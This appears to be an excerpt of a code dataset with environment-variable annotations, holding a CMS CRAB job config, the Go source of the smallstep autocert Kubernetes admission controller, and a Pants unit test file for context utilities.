filename
stringlengths 4
198
| content
stringlengths 25
939k
| environment
sequence | variablearg
sequence | constarg
sequence | variableargjson
stringclasses 1
value | constargjson
stringlengths 2
3.9k
| lang
stringclasses 3
values | constargcount
float64 0
129
⌀ | variableargcount
float64 0
0
⌀ | sentence
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|
Kai/crab/NANOv7_Fri13/2017/MuMu/crab_cfg_2017_MuMu_E.py | import os
from WMCore.Configuration import Configuration
from CRABClient.UserUtilities import config, getUsernameFromCRIC
config = Configuration()
config.section_("General")
config.General.requestName = '2017_MuMu_E'
config.General.transferOutputs = True
config.General.transferLogs = True
config.section_("JobType")
config.JobType.allowUndistributedCMSSW = True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'PSet.py'
config.JobType.maxMemoryMB = 2000
config.JobType.maxJobRuntimeMin = 1315
config.JobType.numCores = 1
config.JobType.scriptExe = 'crab_script_2017_MuMu_E.sh'
config.JobType.inputFiles = ['crab_script_2017_MuMu_E.py',
os.path.join(os.environ['CMSSW_BASE'],'src/PhysicsTools/NanoAODTools/scripts/haddnano.py'),
]
config.JobType.outputFiles = ['hist.root']
config.JobType.sendPythonFolder = True
config.section_("Data")
config.Data.inputDataset = '/DoubleMuon/Run2017E-02Apr2020-v1/NANOAOD'
config.Data.inputDBS = 'global'
config.Data.splitting = 'FileBased'
if config.Data.splitting == 'FileBased':
config.Data.unitsPerJob = 1
# config.Data.totalUnits = $TOTAL_UNITS
# config.Data.userInputFiles = []
config.Data.outLFNDirBase = '/store/user/{user}/Fri13'.format(user=getUsernameFromCRIC())
config.Data.publication = True
config.Data.outputDatasetTag = 'Fri13'
config.section_("Site")
config.Site.storageSite = 'T2_CH_CERN'
| [] | [] | [
"CMSSW_BASE"
] | [] | ["CMSSW_BASE"] | python | 1 | 0 | |
controller/main.go | package main
import (
"bytes"
"context"
"crypto/sha256"
"encoding/base64"
"encoding/hex"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
"time"
"github.com/ghodss/yaml"
"github.com/pkg/errors"
log "github.com/sirupsen/logrus"
"github.com/smallstep/certificates/ca"
"github.com/smallstep/certificates/pki"
"github.com/smallstep/cli/utils"
"go.step.sm/crypto/pemutil"
v1 "k8s.io/api/admission/v1"
authv1 "k8s.io/api/authentication/v1"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/serializer"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
)
var (
runtimeScheme = runtime.NewScheme()
codecs = serializer.NewCodecFactory(runtimeScheme)
deserializer = codecs.UniversalDeserializer()
)
const (
rootOnlyKey = "autocert.step.sm/root-only"
admissionWebhookAnnotationKey = "autocert.step.sm/name"
admissionWebhookStatusKey = "autocert.step.sm/status"
durationWebhookStatusKey = "autocert.step.sm/duration"
firstAnnotationKey = "autocert.step.sm/init-first"
bootstrapperOnlyAnnotationKey = "autocert.step.sm/bootstrapper-only"
sansAnnotationKey = "autocert.step.sm/sans"
volumeMountPath = "/var/run/autocert.step.sm"
)
// Config options for the autocert admission controller.
type Config struct {
Address string `yaml:"address"`
Service string `yaml:"service"`
LogFormat string `yaml:"logFormat"`
CaURL string `yaml:"caUrl"`
CertLifetime string `yaml:"certLifetime"`
Bootstrapper corev1.Container `yaml:"bootstrapper"`
Renewer corev1.Container `yaml:"renewer"`
CertsVolume corev1.Volume `yaml:"certsVolume"`
SATokenVolume corev1.Volume `yaml:"saTokenVolume"`
RestrictCertificatesToNamespace bool `yaml:"restrictCertificatesToNamespace"`
ClusterDomain string `yaml:"clusterDomain"`
InternalDomain string `yaml:"internalDomain"`
RootCAPath string `yaml:"rootCAPath"`
ProvisionerPasswordPath string `yaml:"provisionerPasswordPath"`
}
// GetAddress returns the address set in the configuration, defaults to ":4443"
// if it's not specified.
func (c Config) GetAddress() string {
if c.Address != "" {
return c.Address
}
return ":4443"
}
// GetServiceName returns the service name set in the configuration, defaults to
// "autocert" if it's not specified.
func (c Config) GetServiceName() string {
if c.Service != "" {
return c.Service
}
return "autocert"
}
// GetClusterDomain returns the Kubernetes cluster domain, defaults to
// "cluster.local" if not specified in the configuration.
func (c Config) GetClusterDomain() string {
if c.ClusterDomain != "" {
return c.ClusterDomain
}
return "cluster.local"
}
// GetRootCAPath returns the root CA path in the configuration, defaults to
// "STEPPATH/certs/root_ca.crt" if it's not specified.
func (c Config) GetRootCAPath() string {
if c.RootCAPath != "" {
return c.RootCAPath
}
return pki.GetRootCAPath()
}
// GetProvisionerPasswordPath returns the path to the provisioner password,
// defaults to "/home/step/password/password" if not specified in the
// configuration.
func (c Config) GetProvisionerPasswordPath() string {
if c.ProvisionerPasswordPath != "" {
return c.ProvisionerPasswordPath
}
return "/home/step/password/password"
}
// PatchOperation represents a RFC6902 JSONPatch Operation
type PatchOperation struct {
Op string `json:"op"`
Path string `json:"path"`
Value interface{} `json:"value,omitempty"`
}
// RFC6901 JSONPath Escaping -- https://tools.ietf.org/html/rfc6901
func escapeJSONPath(path string) string {
// Replace`~` with `~0` then `/` with `~1`. Note that the order
// matters otherwise we'll turn a `/` into a `~/`.
path = strings.Replace(path, "~", "~0", -1)
path = strings.Replace(path, "/", "~1", -1)
return path
}
func loadConfig(file string) (*Config, error) {
data, err := ioutil.ReadFile(file)
if err != nil {
return nil, err
}
var cfg Config
if err := yaml.Unmarshal(data, &cfg); err != nil {
return nil, err
}
return &cfg, nil
}
// mkBootstrapper generates a bootstrap container based on the template defined in Config. It
// generates a new bootstrap token and mounts it, along with other required configuration, as
// environment variables in the returned bootstrap container.
func mkBootstrapper(config *Config, podName string, rootOnly bool, commonName, duration, namespace string) (corev1.Container, error) {
b := config.Bootstrapper
// Generate CA fingerprint
crt, err := pemutil.ReadCertificate(config.GetRootCAPath())
if err != nil {
return b, errors.Wrap(err, "CA fingerprint")
}
sum := sha256.Sum256(crt.Raw)
fingerprint := strings.ToLower(hex.EncodeToString(sum[:]))
if rootOnly {
b.Env = append(b.Env, corev1.EnvVar{
Name: "ROOT_ONLY",
Value: "true",
})
}
b.Env = append(b.Env, corev1.EnvVar{
Name: "COMMON_NAME",
Value: commonName,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "DURATION",
Value: duration,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "STEP_CA_URL",
Value: config.CaURL,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "STEP_FINGERPRINT",
Value: fingerprint,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "STEP_NOT_AFTER",
Value: config.CertLifetime,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "POD_NAME",
Value: podName,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "NAMESPACE",
Value: namespace,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "CLUSTER_DOMAIN",
Value: config.ClusterDomain,
})
b.TTY = true
return b, nil
}
// mkRenewer generates a new renewer based on the template provided in Config.
func mkRenewer(config *Config, podName, commonName, namespace string) corev1.Container {
r := config.Renewer
r.Env = append(r.Env, corev1.EnvVar{
Name: "STEP_CA_URL",
Value: config.CaURL,
})
r.Env = append(r.Env, corev1.EnvVar{
Name: "COMMON_NAME",
Value: commonName,
})
r.Env = append(r.Env, corev1.EnvVar{
Name: "POD_NAME",
Value: podName,
})
r.Env = append(r.Env, corev1.EnvVar{
Name: "NAMESPACE",
Value: namespace,
})
r.Env = append(r.Env, corev1.EnvVar{
Name: "CLUSTER_DOMAIN",
Value: config.ClusterDomain,
})
return r
}
func removeInitContainers() (ops PatchOperation) {
return PatchOperation{
Op: "remove",
Path: "/spec/initContainers",
}
}
func addContainers(existing, new []corev1.Container, path string) (ops []PatchOperation) {
if len(existing) == 0 {
return []PatchOperation{
{
Op: "add",
Path: path,
Value: new,
},
}
}
for _, add := range new {
ops = append(ops, PatchOperation{
Op: "add",
Path: path + "/-",
Value: add,
})
}
return ops
}
func addVolumes(existing, new []corev1.Volume, path string) (ops []PatchOperation) {
if len(existing) == 0 {
return []PatchOperation{
{
Op: "add",
Path: path,
Value: new,
},
}
}
for _, add := range new {
ops = append(ops, PatchOperation{
Op: "add",
Path: path + "/-",
Value: add,
})
}
return ops
}
func addCertsVolumeMount(volumeName string, containers []corev1.Container, containerType string, first bool) (ops []PatchOperation) {
volumeMount := corev1.VolumeMount{
Name: volumeName,
MountPath: volumeMountPath,
ReadOnly: true,
}
add := 0
if first {
add = 1
}
for i, container := range containers {
if len(container.VolumeMounts) == 0 {
ops = append(ops, PatchOperation{
Op: "add",
Path: fmt.Sprintf("/spec/%s/%v/volumeMounts", containerType, i+add),
Value: []corev1.VolumeMount{volumeMount},
})
} else {
ops = append(ops, PatchOperation{
Op: "add",
Path: fmt.Sprintf("/spec/%s/%v/volumeMounts/-", containerType, i+add),
Value: volumeMount,
})
}
}
return ops
}
func addAnnotations(existing, new map[string]string) (ops []PatchOperation) {
if len(existing) == 0 {
return []PatchOperation{
{
Op: "add",
Path: "/metadata/annotations",
Value: new,
},
}
}
for k, v := range new {
if existing[k] == "" {
ops = append(ops, PatchOperation{
Op: "add",
Path: "/metadata/annotations/" + escapeJSONPath(k),
Value: v,
})
} else {
ops = append(ops, PatchOperation{
Op: "replace",
Path: "/metadata/annotations/" + escapeJSONPath(k),
Value: v,
})
}
}
return ops
}
// patch produces a list of patches to apply to a pod to inject a certificate. In particular,
// we patch the pod in order to:
// - Mount the `certs` volume in existing containers and initContainers defined in the pod
// - Add the autocert-renewer as a container (a sidecar)
// - Add the autocert-bootstrapper as an initContainer
// - Add the `certs` volume definition
// - Annotate the pod to indicate that it's been processed by this controller
// The result is a list of serialized JSONPatch objects (or an error).
func patch(pod *corev1.Pod, namespace string, config *Config) ([]byte, error) {
var ops []PatchOperation
name := pod.ObjectMeta.GetName()
if name == "" {
name = pod.ObjectMeta.GetGenerateName()
}
annotations := pod.ObjectMeta.GetAnnotations()
rootOnly := annotations[rootOnlyKey] == "true"
commonName := annotations[admissionWebhookAnnotationKey]
first := strings.EqualFold(annotations[firstAnnotationKey], "true")
bootstrapperOnly := strings.EqualFold(annotations[bootstrapperOnlyAnnotationKey], "true")
duration := annotations[durationWebhookStatusKey]
renewer := mkRenewer(config, name, commonName, namespace)
bootstrapper, err := mkBootstrapper(config, name, rootOnly, commonName, duration, namespace)
if err != nil {
return nil, err
}
if first {
if len(pod.Spec.InitContainers) > 0 {
ops = append(ops, removeInitContainers())
}
initContainers := append([]corev1.Container{bootstrapper}, pod.Spec.InitContainers...)
ops = append(ops, addContainers([]corev1.Container{}, initContainers, "/spec/initContainers")...)
} else {
ops = append(ops, addContainers(pod.Spec.InitContainers, []corev1.Container{bootstrapper}, "/spec/initContainers")...)
}
ops = append(ops, addCertsVolumeMount(config.CertsVolume.Name, pod.Spec.Containers, "containers", false)...)
ops = append(ops, addCertsVolumeMount(config.CertsVolume.Name, pod.Spec.InitContainers, "initContainers", first)...)
if !rootOnly && !bootstrapperOnly {
ops = append(ops, addContainers(pod.Spec.Containers, []corev1.Container{renewer}, "/spec/containers")...)
}
ops = append(ops, addVolumes(pod.Spec.Volumes, []corev1.Volume{config.CertsVolume}, "/spec/volumes")...)
ops = append(ops, addVolumes(pod.Spec.Volumes, []corev1.Volume{config.SATokenVolume}, "/spec/volumes")...)
ops = append(ops, addAnnotations(pod.Annotations, map[string]string{admissionWebhookStatusKey: "injected"})...)
return json.Marshal(ops)
}
// shouldMutate checks whether a pod is subject to mutation by this admission controller. A pod
// is subject to mutation if it's annotated with the `admissionWebhookAnnotationKey` and if it
// has not already been processed (indicated by `admissionWebhookStatusKey` set to `injected`).
// If the pod requests a certificate with a subject matching a namespace other than its own
// and restrictToNamespace is true, then shouldMutate will return a validation error
// that should be returned to the client.
func shouldMutate(metadata *metav1.ObjectMeta, namespace string, clusterDomain string, restrictToNamespace bool) (bool, error) {
annotations := metadata.GetAnnotations()
if annotations == nil {
annotations = map[string]string{}
}
// Only mutate if the object is annotated appropriately (annotation key set) and we haven't
// mutated already (status key isn't set).
if annotations[admissionWebhookStatusKey] == "injected" {
return false, nil
}
if annotations[rootOnlyKey] == "true" {
return true, nil
}
if annotations[admissionWebhookAnnotationKey] == "" {
return false, nil
}
if !restrictToNamespace {
return true, nil
}
subject := strings.Trim(annotations[admissionWebhookAnnotationKey], ".")
err := fmt.Errorf("subject \"%s\" matches a namespace other than \"%s\" and is not permitted. This check can be disabled by setting restrictCertificatesToNamespace to false in the autocert-config ConfigMap", subject, namespace)
if strings.HasSuffix(subject, ".svc") && !strings.HasSuffix(subject, fmt.Sprintf(".%s.svc", namespace)) {
return false, err
}
if strings.HasSuffix(subject, fmt.Sprintf(".svc.%s", clusterDomain)) && !strings.HasSuffix(subject, fmt.Sprintf(".%s.svc.%s", namespace, clusterDomain)) {
return false, err
}
return true, nil
}
// mutate takes an `AdmissionReview`, determines whether it is subject to mutation, and returns
// an appropriate `AdmissionResponse` including patches or any errors that occurred.
func mutate(review *v1.AdmissionReview, config *Config) *v1.AdmissionResponse {
ctxLog := log.WithField("uid", review.Request.UID)
request := review.Request
var pod corev1.Pod
if err := json.Unmarshal(request.Object.Raw, &pod); err != nil {
ctxLog.WithField("error", err).Error("Error unmarshaling pod")
return &v1.AdmissionResponse{
Allowed: false,
UID: request.UID,
Result: &metav1.Status{
Message: err.Error(),
},
}
}
ctxLog = ctxLog.WithFields(log.Fields{
"kind": request.Kind,
"operation": request.Operation,
"name": pod.Name,
"generateName": pod.GenerateName,
"namespace": request.Namespace,
"user": request.UserInfo,
})
mutationAllowed, validationErr := shouldMutate(&pod.ObjectMeta, request.Namespace, config.GetClusterDomain(), config.RestrictCertificatesToNamespace)
if validationErr != nil {
ctxLog.WithField("error", validationErr).Info("Validation error")
return &v1.AdmissionResponse{
Allowed: false,
UID: request.UID,
Result: &metav1.Status{
Message: validationErr.Error(),
},
}
}
if !mutationAllowed {
ctxLog.WithField("annotations", pod.Annotations).Info("Skipping mutation")
return &v1.AdmissionResponse{
Allowed: true,
UID: request.UID,
}
}
patchBytes, err := patch(&pod, request.Namespace, config)
if err != nil {
ctxLog.WithField("error", err).Error("Error generating patch")
return &v1.AdmissionResponse{
Allowed: false,
UID: request.UID,
Result: &metav1.Status{
Message: err.Error(),
},
}
}
ctxLog.WithField("patch", string(patchBytes)).Info("Generated patch")
return &v1.AdmissionResponse{
Allowed: true,
Patch: patchBytes,
UID: request.UID,
PatchType: func() *v1.PatchType {
pt := v1.PatchTypeJSONPatch
return &pt
}(),
}
}
func main() {
if len(os.Args) != 2 {
log.Errorf("Usage: %s <config>\n", os.Args[0])
os.Exit(1)
}
config, err := loadConfig(os.Args[1])
if err != nil {
panic(err)
}
log.SetOutput(os.Stdout)
if config.LogFormat == "json" {
log.SetFormatter(&log.JSONFormatter{})
}
if config.LogFormat == "text" {
log.SetFormatter(&log.TextFormatter{})
}
log.WithFields(log.Fields{
"config": config,
}).Info("Loaded config")
provisionerName := os.Getenv("PROVISIONER_NAME")
provisionerKid := os.Getenv("PROVISIONER_KID")
log.WithFields(log.Fields{
"provisionerName": provisionerName,
"provisionerKid": provisionerKid,
}).Info("Loaded provisioner configuration")
password, err := utils.ReadPasswordFromFile(config.GetProvisionerPasswordPath())
if err != nil {
panic(err)
}
provisioner, err := ca.NewProvisioner(
provisionerName, provisionerKid, config.CaURL, password,
ca.WithRootFile(config.GetRootCAPath()))
if err != nil {
log.Errorf("Error loading provisioner: %v", err)
os.Exit(1)
}
log.WithFields(log.Fields{
"name": provisioner.Name(),
"kid": provisioner.Kid(),
}).Info("Loaded provisioner")
namespace := os.Getenv("NAMESPACE")
if namespace == "" {
log.Errorf("$NAMESPACE not set")
os.Exit(1)
}
name := fmt.Sprintf("%s.%s.svc", config.GetServiceName(), namespace)
token, err := provisioner.Token(name)
if err != nil {
log.WithField("error", err).Errorf("Error generating bootstrap token during controller startup")
os.Exit(1)
}
log.WithField("name", name).Infof("Generated bootstrap token for controller")
// make sure to cancel the renew goroutine
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
srv, err := ca.BootstrapServer(ctx, token, &http.Server{
Addr: config.GetAddress(),
Handler: http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if r.URL.Path == "/healthz" {
log.Debug("/healthz")
w.WriteHeader(http.StatusOK)
fmt.Fprintln(w, "ok")
return
}
if r.URL.Path == "/token" {
log.Debug("/token")
token, status, err := handleTokenRequest(ctx, provisioner, r, config)
if err != nil {
log.WithError(err).Error("error occurred while processing token request")
w.WriteHeader(status)
return
}
w.WriteHeader(http.StatusOK)
fmt.Fprintln(w, token)
return
}
if r.URL.Path != "/mutate" {
log.WithField("path", r.URL.Path).Error("Bad Request: 404 Not Found")
http.NotFound(w, r)
return
}
var body []byte
if r.Body != nil {
if data, err := ioutil.ReadAll(r.Body); err == nil {
body = data
}
}
if len(body) == 0 {
log.Error("Bad Request: 400 (Empty Body)")
http.Error(w, "Bad Request (Empty Body)", http.StatusBadRequest)
return
}
contentType := r.Header.Get("Content-Type")
if contentType != "application/json" {
log.WithField("Content-Type", contentType).Error("Bad Request: 415 (Unsupported Media Type)")
http.Error(w, fmt.Sprintf("Bad Request: 415 Unsupported Media Type (Expected Content-Type 'application/json' but got '%s')", contentType), http.StatusUnsupportedMediaType)
return
}
var response *v1.AdmissionResponse
review := v1.AdmissionReview{
TypeMeta: metav1.TypeMeta{
APIVersion: v1.SchemeGroupVersion.String(),
Kind: "AdmissionReview",
},
}
if _, _, err := deserializer.Decode(body, nil, &review); err != nil {
log.WithFields(log.Fields{
"body": body,
"error": err,
}).Error("Can't decode body")
response = &v1.AdmissionResponse{
Allowed: false,
Result: &metav1.Status{
Message: err.Error(),
},
}
} else {
response = mutate(&review, config)
}
resp, err := json.Marshal(v1.AdmissionReview{
TypeMeta: metav1.TypeMeta{
APIVersion: v1.SchemeGroupVersion.String(),
Kind: "AdmissionReview",
},
Response: response,
})
if err != nil {
log.WithFields(log.Fields{
"uid": review.Request.UID,
"error": err,
}).Info("Marshal error")
http.Error(w, fmt.Sprintf("Marshal Error: %v", err), http.StatusInternalServerError)
} else {
log.WithFields(log.Fields{
"uid": review.Request.UID,
"response": string(resp),
}).Info("Returning review")
if _, err := w.Write(resp); err != nil {
log.WithFields(log.Fields{
"uid": review.Request.UID,
"error": err,
}).Info("Write error")
}
}
}),
}, ca.VerifyClientCertIfGiven())
if err != nil {
panic(err)
}
log.Info("Listening on", config.GetAddress(), "...")
if err := srv.ListenAndServeTLS("", ""); err != nil {
panic(err)
}
}
// handleTokenRequest authorizes the request by sending a TokenReview with the service account token to apiserver,
// then it will generate a token with the pod IP as part of the SANs and send it back to the bootstrapper
func handleTokenRequest(ctx context.Context, provisioner *ca.Provisioner, r *http.Request, config *Config) (string, int, error) {
var token string
authHeader := r.Header.Get("Authorization")
if authHeader == "" {
return token, http.StatusUnauthorized, errors.New("missing authorization header")
}
// TODO: Make this a bit more robust, parsing-wise
authHeaderParts := strings.Fields(authHeader)
if len(authHeaderParts) != 2 || strings.ToLower(authHeaderParts[0]) != "bearer" {
return token, http.StatusBadRequest, errors.New("Authorization header format must be Bearer {token}")
}
saToken := authHeaderParts[1]
c, err := getK8sClient()
if err != nil {
return token, http.StatusInternalServerError, err
}
review := authv1.TokenReview{Spec: authv1.TokenReviewSpec{
Token: saToken,
Audiences: []string{"autocert"},
}}
resp, err := c.AuthenticationV1().TokenReviews().Create(ctx, &review, metav1.CreateOptions{})
if err != nil {
return token, http.StatusInternalServerError, err
}
if !resp.Status.Authenticated {
return token, http.StatusUnauthorized, errors.New("invalid sa token")
}
saTokenParsed, err := parseSAToken(saToken)
if err != nil {
return token, http.StatusInternalServerError, err
}
token, err = generateToken(provisioner, saTokenParsed.K8s.Namespace, saTokenParsed.K8s.Pod.Name, config.ClusterDomain, config.InternalDomain)
if err != nil {
return token, http.StatusInternalServerError, err
}
return token, http.StatusOK, nil
}
func parseSAToken(saTokenString string) (saToken, error) {
token := saToken{}
parts := strings.Split(saTokenString, ".")
seg := parts[1]
if l := len(seg) % 4; l > 0 {
seg += strings.Repeat("=", 4-l)
}
segment, err := base64.URLEncoding.DecodeString(seg)
if err != nil {
return token, err
}
decoder := json.NewDecoder(bytes.NewBuffer(segment))
err = decoder.Decode(&token)
if err != nil {
return token, err
}
return token, nil
}
type saToken struct {
K8s struct {
Namespace string `json:"namespace,omitempty"`
Pod struct {
Name string `json:"name,omitempty"`
} `json:"pod,omitempty"`
} `json:"kubernetes.io,omitempty"`
}
func generateToken(provisioner *ca.Provisioner, ns string, podName string, domain string, internalDomain string) (string, error) {
c, err := getK8sClient()
if err != nil {
return "", err
}
var pod *corev1.Pod
var counter int
timeout, cancelFunc := context.WithTimeout(context.Background(), 10*time.Second)
err = wait.PollImmediateUntil(2*time.Second, func() (done bool, err error) {
log.WithField("counter", counter).Info("fetching pod IP")
counter++
var e error
pod, e = c.CoreV1().Pods(ns).Get(timeout, podName, metav1.GetOptions{})
if e != nil {
log.WithError(e).Error("failed to fetch pod IP")
return false, nil
}
return pod.Status.PodIP != "", nil
}, timeout.Done())
cancelFunc()
if err != nil {
return "", err
}
annotations := pod.ObjectMeta.GetAnnotations()
commonName := annotations[admissionWebhookAnnotationKey]
splitCommonNameFn := func(c rune) bool {
return c == '.'
}
segments := strings.FieldsFunc(commonName, splitCommonNameFn)
if len(segments) <= 0 {
return "", errors.Errorf("invalid common name: %s", commonName)
}
svcName := segments[0]
timeout, cancelFunc = context.WithTimeout(context.Background(), 10*time.Second)
service, err := c.CoreV1().Services(ns).Get(timeout, svcName, metav1.GetOptions{})
cancelFunc()
if err != nil {
return "", err
}
svcSans := []string{svcName,
fmt.Sprintf("%s.%s", svcName, ns),
fmt.Sprintf("%s.%s.svc", svcName, ns),
fmt.Sprintf("%s.%s.svc.%s", svcName, ns, domain),
service.Spec.ClusterIP}
if service.Spec.Type == corev1.ServiceTypeLoadBalancer {
ing := service.Status.LoadBalancer.Ingress
if len(ing) <= 0 {
log.Warnf("external IP address of the LB service [%s] not available, skipping", svcName)
} else {
svcSans = append(svcSans, ing[0].IP)
}
if internalDomain != "" {
svcSans = append(svcSans, fmt.Sprintf("%s.%s", svcName, internalDomain))
}
}
splitFn := func(c rune) bool {
return c == ','
}
sans := strings.FieldsFunc(annotations[sansAnnotationKey], splitFn)
if len(sans) == 0 {
sans = []string{commonName}
}
sans = append(sans, svcSans...)
sans = append(sans, pod.Status.PodIP, "localhost", "127.0.0.1")
log.Info("sans:", sans)
token, err := provisioner.Token(commonName, sans...)
if err != nil {
return "", errors.Wrap(err, "failed to generate token")
}
return token, nil
}
func getK8sClient() (*kubernetes.Clientset, error) {
kc, err := rest.InClusterConfig()
if err != nil {
return nil, err
}
kubeClient, err := kubernetes.NewForConfig(kc)
if err != nil {
return nil, err
}
return kubeClient, nil
}
| [
"\"PROVISIONER_NAME\"",
"\"PROVISIONER_KID\"",
"\"NAMESPACE\""
] | [] | [
"PROVISIONER_KID",
"PROVISIONER_NAME",
"NAMESPACE"
] | [] | ["PROVISIONER_KID", "PROVISIONER_NAME", "NAMESPACE"] | go | 3 | 0 | |
tests/python/pants_test/util/test_contextutil.py | # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import os
import pstats
import shutil
import signal
import subprocess
import sys
import unittest
import unittest.mock
import uuid
import zipfile
from contextlib import contextmanager
from typing import Iterator
from pants.util.contextutil import (
InvalidZipPath,
Timer,
environment_as,
exception_logging,
hermetic_environment_as,
maybe_profiled,
open_zip,
pushd,
signal_handler_as,
stdio_as,
temporary_dir,
temporary_file,
)
PATCH_OPTS = dict(autospec=True, spec_set=True)
class ContextutilTest(unittest.TestCase):
@contextmanager
def ensure_user_defined_in_environment(self) -> Iterator[None]:
"""Utility to test for hermetic environments."""
original_env = os.environ.copy()
if "USER" not in original_env:
os.environ["USER"] = "pantsbuild"
try:
yield
finally:
os.environ.clear()
os.environ.update(original_env)
def test_empty_environment(self) -> None:
with environment_as():
pass
def test_override_single_variable(self) -> None:
with temporary_file(binary_mode=False) as output:
# test that the override takes place
with environment_as(HORK='BORK'):
subprocess.Popen([sys.executable, '-c', 'import os; print(os.environ["HORK"])'],
stdout=output).wait()
output.seek(0)
self.assertEqual('BORK\n', output.read())
# test that the variable is cleared
with temporary_file(binary_mode=False) as new_output:
subprocess.Popen([sys.executable, '-c', 'import os; print("HORK" in os.environ)'],
stdout=new_output).wait()
new_output.seek(0)
self.assertEqual('False\n', new_output.read())
def test_environment_negation(self) -> None:
with temporary_file(binary_mode=False) as output:
with environment_as(HORK='BORK'):
with environment_as(HORK=None):
# test that the variable is cleared
subprocess.Popen([sys.executable, '-c', 'import os; print("HORK" in os.environ)'],
stdout=output).wait()
output.seek(0)
self.assertEqual('False\n', output.read())
def test_hermetic_environment(self) -> None:
with self.ensure_user_defined_in_environment():
with hermetic_environment_as():
self.assertNotIn('USER', os.environ)
def test_hermetic_environment_subprocesses(self) -> None:
with self.ensure_user_defined_in_environment():
with hermetic_environment_as(AAA='333'):
output = subprocess.check_output('env', shell=True).decode()
self.assertNotIn('USER=', output)
self.assertIn('AAA', os.environ)
self.assertEqual(os.environ['AAA'], '333')
self.assertIn('USER', os.environ)
self.assertNotIn('AAA', os.environ)
def test_hermetic_environment_unicode(self) -> None:
with environment_as(XXX='¡'):
self.assertEqual(os.environ['XXX'], '¡')
with hermetic_environment_as(AAA='¡'):
self.assertIn('AAA', os.environ)
self.assertEqual(os.environ['AAA'], '¡')
self.assertEqual(os.environ['XXX'], '¡')
def test_simple_pushd(self) -> None:
pre_cwd = os.getcwd()
with temporary_dir() as tempdir:
with pushd(tempdir) as path:
self.assertEqual(tempdir, path)
self.assertEqual(os.path.realpath(tempdir), os.getcwd())
self.assertEqual(pre_cwd, os.getcwd())
self.assertEqual(pre_cwd, os.getcwd())
def test_nested_pushd(self) -> None:
pre_cwd = os.getcwd()
with temporary_dir() as tempdir1:
with pushd(tempdir1):
self.assertEqual(os.path.realpath(tempdir1), os.getcwd())
with temporary_dir(root_dir=tempdir1) as tempdir2:
with pushd(tempdir2):
self.assertEqual(os.path.realpath(tempdir2), os.getcwd())
self.assertEqual(os.path.realpath(tempdir1), os.getcwd())
self.assertEqual(os.path.realpath(tempdir1), os.getcwd())
self.assertEqual(pre_cwd, os.getcwd())
self.assertEqual(pre_cwd, os.getcwd())
def test_temporary_file_no_args(self) -> None:
with temporary_file() as fp:
self.assertTrue(os.path.exists(fp.name), 'Temporary file should exist within the context.')
self.assertTrue(os.path.exists(fp.name) == False,
'Temporary file should not exist outside of the context.')
def test_temporary_file_without_cleanup(self) -> None:
with temporary_file(cleanup=False) as fp:
self.assertTrue(os.path.exists(fp.name), 'Temporary file should exist within the context.')
self.assertTrue(os.path.exists(fp.name),
'Temporary file should exist outside of context if cleanup=False.')
os.unlink(fp.name)
def test_temporary_file_within_other_dir(self) -> None:
with temporary_dir() as path:
with temporary_file(root_dir=path) as f:
self.assertTrue(os.path.realpath(f.name).startswith(os.path.realpath(path)),
'file should be created in root_dir if specified.')
def test_temporary_dir_no_args(self) -> None:
with temporary_dir() as path:
self.assertTrue(os.path.exists(path), 'Temporary dir should exist within the context.')
self.assertTrue(os.path.isdir(path), 'Temporary dir should be a dir and not a file.')
self.assertFalse(os.path.exists(path), 'Temporary dir should not exist outside of the context.')
def test_temporary_dir_without_cleanup(self) -> None:
with temporary_dir(cleanup=False) as path:
self.assertTrue(os.path.exists(path), 'Temporary dir should exist within the context.')
self.assertTrue(os.path.exists(path),
'Temporary dir should exist outside of context if cleanup=False.')
shutil.rmtree(path)
def test_temporary_dir_with_root_dir(self) -> None:
with temporary_dir() as path1:
with temporary_dir(root_dir=path1) as path2:
self.assertTrue(os.path.realpath(path2).startswith(os.path.realpath(path1)),
'Nested temporary dir should be created within outer dir.')
def test_timer(self) -> None:
class FakeClock:
def __init__(self):
self._time = 0.0
def time(self) -> float:
ret: float = self._time
self._time += 0.0001 # Force a little time to elapse.
return ret
def sleep(self, duration: float) -> None:
self._time += duration
clock = FakeClock()
# Note: to test with the real system clock, use this instead:
# import time
# clock = time
with Timer(clock=clock) as t:
self.assertLess(t.start, clock.time())
self.assertGreater(t.elapsed, 0)
clock.sleep(0.1)
self.assertGreater(t.elapsed, 0.1)
clock.sleep(0.1)
self.assertTrue(t.finish is None)
self.assertGreater(t.elapsed, 0.2)
self.assertLess(t.finish, clock.time())
def test_open_zipDefault(self) -> None:
with temporary_dir() as tempdir:
with open_zip(os.path.join(tempdir, 'test'), 'w') as zf:
self.assertTrue(zf._allowZip64) # type: ignore
def test_open_zipTrue(self) -> None:
with temporary_dir() as tempdir:
with open_zip(os.path.join(tempdir, 'test'), 'w', allowZip64=True) as zf:
self.assertTrue(zf._allowZip64) # type: ignore
def test_open_zipFalse(self) -> None:
with temporary_dir() as tempdir:
with open_zip(os.path.join(tempdir, 'test'), 'w', allowZip64=False) as zf:
self.assertFalse(zf._allowZip64) # type: ignore
def test_open_zip_raises_exception_on_falsey_paths(self):
falsey = (None, '', False)
for invalid in falsey:
with self.assertRaises(InvalidZipPath), open_zip(invalid):
pass
def test_open_zip_returns_realpath_on_badzipfile(self) -> None:
# In case of file corruption, deleting a Pants-constructed symlink would not resolve the error.
with temporary_file() as not_zip:
with temporary_dir() as tempdir:
file_symlink = os.path.join(tempdir, 'foo')
os.symlink(not_zip.name, file_symlink)
self.assertEqual(os.path.realpath(file_symlink), os.path.realpath(not_zip.name))
